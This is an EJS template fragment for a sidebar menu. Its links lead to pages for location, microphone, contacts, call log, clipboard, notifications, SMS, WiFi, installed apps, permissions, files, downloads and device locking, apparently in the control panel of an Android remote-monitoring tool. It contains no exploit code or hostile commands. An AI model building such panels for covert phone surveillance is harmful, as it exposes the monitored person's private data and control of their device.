<div class="four wide column">
    <div class="ui red vertical pointing inverted secondary fluid menu hoverEdit">
        <a href="<%= baseURL %>/info" class="item <% if (page==='info') { %> active <% } %>">
            <i class="icon info gray"></i> Info
        </a>
        <a href="<%= baseURL %>/gps" class="item <% if (page==='gps') { %> active <% } %>">
            <i class="icon map marker alternate gray"></i> Location
        </a>
        <a href="<%= baseURL %>/microphone" class="item <% if (page==='microphone') { %> active <% } %>">
            <i class="icon microphone gray"></i> Microphone
        </a>
        <a href="<%= baseURL %>/contacts" class="item <% if (page==='contacts') { %> active <% } %>">
            <i class="icon address book gray"></i> Contacts
        </a>
        <a href="<%= baseURL %>/calls" class="item <% if (page==='calls') { %> active <% } %>">
            <i class="icon phone gray"></i> Call Log
        </a>
        <a href="<%= baseURL %>/clipboard" class="item <% if (page==='clipboard') { %> active <% } %>">
            <i class="icon clipboard gray"></i> Clipboard Log
        </a>
        <a href="<%= baseURL %>/notifications" class="item <% if (page==='notifications') { %> active <% } %>">
            <i class="icon exclamation gray"></i> Notification Log
        </a>
        <a href="<%= baseURL %>/sms" class="item <% if (page==='sms') { %> active <% } %>">
            <i class="icon comments gray"></i> SMS Manager
        </a>
        <a href="<%= baseURL %>/wifi" class="item <% if (page==='wifi') { %> active <% } %>">
            <i class="icon wifi gray"></i> WiFi Manager
        </a>
        <a href="<%= baseURL %>/apps" class="item <% if (page==='apps') { %> active <% } %>">
            <i class="icon google play gray"></i> Installed Apps
        </a>
        <a href="<%= baseURL %>/permissions" class="item <% if (page==='permissions') { %> active <% } %>">
            <i class="icon tasks gray"></i> Allowed Permissions
        </a>
        <a href="<%= baseURL %>/files" class="item <% if (page==='files') { %> active <% } %>">
            <i class="icon folder open gray"></i> File Explorer
        </a>
        <a href="<%= baseURL %>/downloads" class="item <% if (page==='downloads') { %> active <% } %>">
            <i class="icon download gray"></i> Downloads
        </a>

        <a href="<%= baseURL %>/lockdevice" class="item <% if (page==='lockdevice') { %> active <% } %>">
            <i class="icon key gray"></i> Lock Device 
        </a>

    </div>

</div>
